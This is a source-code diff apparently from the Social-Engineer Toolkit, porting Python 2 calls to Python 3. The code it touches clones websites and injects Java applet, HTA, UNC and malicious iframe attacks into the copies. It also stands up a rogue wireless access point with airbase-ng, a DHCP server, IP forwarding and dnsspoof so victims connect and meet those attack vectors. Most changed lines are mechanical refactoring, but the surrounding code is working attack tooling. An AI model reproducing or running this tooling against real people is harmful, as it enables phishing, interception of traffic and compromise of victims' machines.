fileopen = file(setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
counter = 0
for line in fileopen:
counter = counter + 1
if counter == 1 or counter == 0:
print(
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC)
print((
bcolors.RED + "[*] Error. Unable to clone this specific site. Check your internet connection.\n" + bcolors.ENDC))
return_continue()
site_cloned = False
os.remove(setdir + "/web_clone/index.html")
# add file to let set interactive shell know it was
# unsuccessful
filewrite = file(setdir + "/cloner.failed", "w")
filewrite = open(setdir + "/cloner.failed", "w")
filewrite.write("failed")
filewrite.close()
@ -206,12 +205,12 @@ try:
# if we specify UNC embedding
if unc_embed == True:
fileopen = file(setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
index_database = fileopen.read()
filewrite = file(setdir + "/web_clone/index.html", "w")
filewrite = open(setdir + "/web_clone/index.html", "w")
# Open the UNC EMBED
fileopen4 = file("src/webattack/web_clone/unc.database", "r")
fileopen4 = open("src/webattack/web_clone/unc.database", "r")
unc_database = fileopen4.read()
unc_database = unc_database.replace("IPREPLACEHERE", ipaddr)
unc_database = unc_database.replace("RANDOMNAME", rand_gen_win)
@ -237,8 +236,8 @@ try:
# Here we parse through the new website and add our java applet code, its a hack for now
# Wrote this on the plane to Russia, easiest way to do this without
# internet access :P
print(
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC)
print((
bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + bcolors.ENDC))
# Read in newly created index.html
time.sleep(2)
if not os.path.isfile(setdir + "/web_clone/index.html"):
@ -247,12 +246,12 @@ try:
"Unable to clone the website it appears. Email us to fix.")
sys.exit()
fileopen = file(setdir + "/web_clone/index.html", "r")
fileopen = open(setdir + "/web_clone/index.html", "r")
# Read add-on for java applet
fileopen2 = file("src/webattack/web_clone/applet.database", "r")
fileopen2 = open("src/webattack/web_clone/applet.database", "r")
# Write to new file with java applet added
filewrite = file(setdir + "/web_clone/index.html.new", "w")
fileopen3 = file("src/webattack/web_clone/repeater.database", "r")
filewrite = open(setdir + "/web_clone/index.html.new", "w")
fileopen3 = open("src/webattack/web_clone/repeater.database", "r")
# this is our cloned website
index_database = fileopen.read()
@ -353,17 +352,17 @@ try:
# close the file after done writing
filewrite.close()
print(bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win +
"\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC)
print((bcolors.BLUE + "[*] Filename obfuscation complete. Payload name is: " + rand_gen_win +
"\n[*] Malicious java applet website prepped for deployment\n" + bcolors.ENDC))
# if we are using HTA attack
if check_options("ATTACK_VECTOR") == "HTA":
# </body>
if os.path.isfile(setdir + "/Launcher.hta"):
data1 = file(setdir + "/web_clone/index.html", "r").read()
data2 = file(setdir + "/hta_index", "r").read()
data1 = open(setdir + "/web_clone/index.html", "r").read()
data2 = open(setdir + "/hta_index", "r").read()
data3 = data1.replace("</body>", data2 + "</body>")
filewrite = file(setdir + "/web_clone/index.html", "w")
filewrite = open(setdir + "/web_clone/index.html", "w")
filewrite.write(data3)
filewrite.close()
print_status("Copying over files to Apache server...")
@ -386,8 +385,8 @@ try:
multi_meta = "on"
if attack_vector == "browser" or multi_meta == "on":
print(
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC)
print((
bcolors.RED + "[*] Injecting iframes into cloned website for MSF Attack...." + bcolors.ENDC))
# Read in newly created index.html
if attack_vector == "multiattack":
if os.path.isfile(setdir + "/web_clone/index.html"):
@ -401,8 +400,8 @@ try:
shutil.copyfile(
setdir + "/web_clone/index.html.new", setdir + "/web_clone/index.html")
time.sleep(1)
fileopen = file(setdir + "/web_clone/index.html", "r").readlines()
filewrite = file(setdir + "/web_clone/index.html.new", "w")
fileopen = open(setdir + "/web_clone/index.html", "r").readlines()
filewrite = open(setdir + "/web_clone/index.html.new", "w")
counter = 0
for line in fileopen:
counter = 0
@ -435,8 +434,8 @@ try:
filewrite.close()
except:
pass
print(
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC)
print((
bcolors.BLUE + "[*] Malicious iframe injection successful...crafting payload.\n" + bcolors.ENDC))
if attack_vector == "java" or attack_vector == "browser" or attack_vector == "multiattack":
if not os.path.isfile(setdir + "/web_clone/%s" % (rand_gen_applet)):

9
src/wireless/stop_wifiattack.py
View file

@ -7,11 +7,14 @@ from src.core.setcore import *
# Simple python script to kill things created by the SET wifi attack vector
#
interface = raw_input(setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
interface = input(
setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
# fix a bug if present
print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (interface), shell=True).wait()
print_status(
"Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;rfkill block all;rfkill unblock all;modprobe rtl8187;rfkill unblock all;ifconfig %s up" % (
interface), shell=True).wait()
print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()

59
src/wireless/wifiattack.py
View file

@ -24,13 +24,15 @@ sys.path.append(definepath)
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
print_warning("isc-dhcp-server does not appear to be installed.")
print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
print_warning(
"apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
print_warning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
exit_set()
if not os.path.isfile(airbase_path):
@ -38,11 +40,13 @@ if not os.path.isfile(airbase_path):
print_info("using SET's local airbase-ng binary")
print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print_info(
"""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print("")
print_status("SET will now launch nano to edit the file.")
print_status("Press ^X to exit nano and don't forget to save the updated file!")
print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
print_warning(
"If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
@ -75,11 +79,12 @@ subnet 192.168.10.0 netmask 255.255.255.0 {
}
""")
show_fakeap_dhcp_menu = create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = raw_input(setprompt(["8"], ""))
show_fakeap_dhcp_menu = create_menu(
text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice,2)
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
@ -89,7 +94,7 @@ if fakeap_dhcp_menu_choice == "":
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite=file(setdir + "/dhcp.conf", "w")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config1)
# close the file
filewrite.close()
@ -98,7 +103,7 @@ if fakeap_dhcp_menu_choice == "1":
if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite=file(setdir + "/dhcp.conf", "w")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config2)
# close the file
filewrite.close()
@ -107,7 +112,8 @@ if fakeap_dhcp_menu_choice == "2":
if fakeap_dhcp_menu_choice == "exit":
exit_set()
interface = raw_input(setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
interface = input(
setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
# place wifi interface into monitor mode
print_status("Placing card in monitor mode via airmon-ng..")
@ -119,8 +125,9 @@ if os.path.isfile("/usr/local/sbin/airmon-ng"):
if not os.path.isfile("/usr/local/sbin/airmon-ng"):
airmonng_path = "src/wireless/airmon-ng"
monproc = subprocess.Popen("%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" % (airmonng_path,interface), shell=True, stdout=subprocess.PIPE)
moniface=monproc.stdout.read()
monproc = subprocess.Popen("%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" %
(airmonng_path, interface), shell=True, stdout=subprocess.PIPE)
moniface = monproc.stdout.read()
monproc.wait()
# execute modprobe tun
@ -128,24 +135,29 @@ subprocess.Popen("modprobe tun", shell=True).wait()
# create a fake access point
print_status("Spawning airbase-ng in a seperate child thread...")
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' % (airbase_path,access_point,ap_channel,moniface))
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' %
(airbase_path, access_point, ap_channel, moniface))
print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)
# bring the interface up
if dhcptun==1:
if dhcptun == 1:
print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen(
"ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
subprocess.Popen(
"route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
if dhcptun==2:
if dhcptun == 2:
print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen("ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen(
"ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen("route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
subprocess.Popen(
"route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
# starts a dhcp server
print_status("Starting the DHCP server on a seperate child thread...")
@ -159,7 +171,10 @@ child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")
print_status("Starting DNSSpoof in a seperate child thread...")
child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))
print_status("SET has finished creating the attack. If you experienced issues please report them.")
print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status("Be sure to come back to this menu to stop the services once your finished.")
print_status(
"SET has finished creating the attack. If you experienced issues please report them.")
print_status(
"Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status(
"Be sure to come back to this menu to stop the services once your finished.")
return_continue()